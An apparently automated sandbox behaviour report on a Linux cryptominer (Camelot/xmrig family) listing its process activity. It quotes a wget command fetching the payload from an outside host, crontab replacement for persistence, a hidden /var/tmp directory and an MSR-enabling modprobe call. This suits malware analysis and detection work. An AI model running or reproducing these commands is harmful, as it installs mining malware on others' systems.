Source: /var/tmp/.rcu_gp/.report_system, type: DROPPED Matched rule: Linux_Cryptominer_Camelot_cdd631c1 reference_sample = 91549c171ae7f43c1a85a303be30169932a071b5c2b6cf3f4913f20073c97897, os = linux, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Cryptominer.Camelot, fingerprint = fa174ac25467ab6e0f11cf1f0a5c6bf653737e9bbdc9411aabeae460a33faa5e, id = cdd631c1-2c03-47dd-b50a-e8c0b9f67271, last_modified = 2021-09-16
Source: classification engine Classification label: mal92.troj.evad.mine.linELF@0/7@4/0

Persistence and Installation Behavior

Source: /bin/bash (PID: 6242) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6250) Crontab executable: /usr/bin/crontab -> crontab /var/tmp/.rcu_gp/.ps5
Source: /bin/bash (PID: 6258) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6286) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6301) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6312) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6322) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6330) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /bin/bash (PID: 6338) Crontab executable: /usr/bin/crontab -> crontab -l
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) File: /proc/6257/mounts
Source: /usr/bin/crontab (PID: 6250) File: /var/spool/cron/crontabs/tmp.VYCskO
Source: /usr/bin/crontab (PID: 6250) File: /var/spool/cron/crontabs/root
Source: /usr/bin/wget (PID: 6233) File written to hidden directory: /var/tmp/.rcu_gp/.report_system
Source: /bin/bash (PID: 6231) File: /var/tmp/.rcu_gp/.ps4
Source: /bin/bash (PID: 6231) File: /var/tmp/.rcu_gp/.ps5
Source: /usr/bin/mkdir (PID: 6232) Directory: /var/tmp/.rcu_gp
Source: /usr/bin/wget (PID: 6233) File: /var/tmp/.rcu_gp/.report_system
Source: /usr/bin/crontab (PID: 6250) Directory: /var/tmp/.rcu_gp/.ps5
Source: /usr/bin/cat (PID: 6254) Directory: /var/tmp/.rcu_gp/.ps4
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Directory: /root/.xmrig.json
Source: /usr/bin/cat (PID: 6283) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6298) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6309) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6317) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6327) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6333) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/cat (PID: 6342) Directory: /var/tmp/.rcu_gp/.ps4
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/6231/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/6231/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1582/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1582/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/3088/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/3088/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/230/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/230/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/110/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/110/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/231/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/231/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/111/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/111/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/232/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/232/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1579/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1579/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/112/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/112/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/233/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/233/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1699/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1699/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/113/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/113/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/234/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/234/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1335/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1335/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1698/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1698/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/114/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/114/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/235/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/235/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1334/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1334/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1576/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1576/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2302/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2302/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/115/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/115/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/236/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/236/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/116/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/116/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/237/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/237/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/117/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/117/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/118/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/118/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/910/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/910/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/119/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/119/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/912/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/912/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/10/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/10/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2307/status
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2307/cmdline
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/918/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/918/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1594/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1594/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1349/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1349/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pgrep (PID: 6285) File opened: /proc/4/cmdline Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6269) Shell command executed: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1" Jump to behavior
Source: /bin/bash (PID: 6239) Chmod executable: /usr/bin/chmod -> chmod +x .report_system Jump to behavior
Source: /bin/bash (PID: 6241) Chmod executable: /usr/bin/chmod -> chmod +x /var/tmp/.rcu_gp/diicot Jump to behavior
Source: /bin/bash (PID: 6243) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6259) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6287) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6302) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6313) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6323) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6331) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6339) Grep executable: /usr/bin/grep -> grep -q .main Jump to behavior
Source: /bin/bash (PID: 6232) Mkdir executable: /usr/bin/mkdir -> mkdir /var/tmp/.rcu_gp Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6256) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6285) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6300) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6311) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6319) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6329) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6335) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/diicot (PID: 6344) Pgrep executable: /usr/bin/pgrep -> pgrep -x .report_system Jump to behavior
Source: /bin/bash (PID: 6244) Rm executable: /usr/bin/rm -> rm -rf /var/tmp/.rcu_gp/.ps5 Jump to behavior
Source: /bin/bash (PID: 6253) Rm executable: /usr/bin/rm -> rm -rf /var/tmp/.rcu_gp/.ps5 Jump to behavior
Source: /bin/bash (PID: 6233) Wget executable: /usr/bin/wget -> wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads from proc file: /proc/cpuinfo Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads from proc file: /proc/meminfo Jump to behavior
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263) Reads from proc file: /proc/meminfo Jump to behavior
Source: /usr/bin/chmod (PID: 6239) File: /var/tmp/.rcu_gp/.report_system (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/chmod (PID: 6241) File: /var/tmp/.rcu_gp/diicot (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /usr/bin/wget (PID: 6233) File written: /var/tmp/.rcu_gp/.report_system Jump to dropped file
Source: /bin/bash (PID: 6240) Writes shell script file to disk with an unusual file extension: /tmp/sh-thd.QhlKa3 Jump to dropped file
Source: /usr/bin/cat (PID: 6240) Writes shell script file to disk with an unusual file extension: /var/tmp/.rcu_gp/diicot Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: /usr/bin/wget (PID: 6233) ELF file: /var/tmp/.rcu_gp/.report_system
Source: /bin/sh (PID: 6270) Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=on
Source: /bin/bash (PID: 6245) Sleep executable: /usr/bin/sleep -> sleep 1
Source: /bin/bash (PID: 6248) Sleep executable: /usr/bin/sleep -> sleep 1
Source: /bin/bash (PID: 6249) Sleep executable: /usr/bin/sleep -> sleep 1
Source: /bin/bash (PID: 6251) Sleep executable: /usr/bin/sleep -> sleep 1
Source: /bin/bash (PID: 6260) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6288) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6303) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6314) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6324) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6332) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /bin/bash (PID: 6340) Sleep executable: /usr/bin/sleep -> sleep 2.5
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from proc file: /proc/cpuinfo
Source: /usr/bin/pgrep (PID: 6256) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpus
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_map
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/level
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/type
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/id
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_size
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_sets
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partition
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Reads CPU info from /sys: /sys/devices/system/cpu/possible
Source: /usr/bin/pgrep (PID: 6285) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6300) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6311) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6319) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6329) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6335) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pgrep (PID: 6344) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /tmp/.main.elf (PID: 6231) Queries kernel information via 'uname':
Source: /bin/bash (PID: 6231) Queries kernel information via 'uname':
Source: /usr/bin/wget (PID: 6233) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6255) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6257) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/./.report_system (PID: 6263) Queries kernel information via 'uname':
Source: /sbin/modprobe (PID: 6270) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6284) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6299) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6310) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6318) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6328) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6334) Queries kernel information via 'uname':
Source: /var/tmp/.rcu_gp/diicot (PID: 6343) Queries kernel information via 'uname':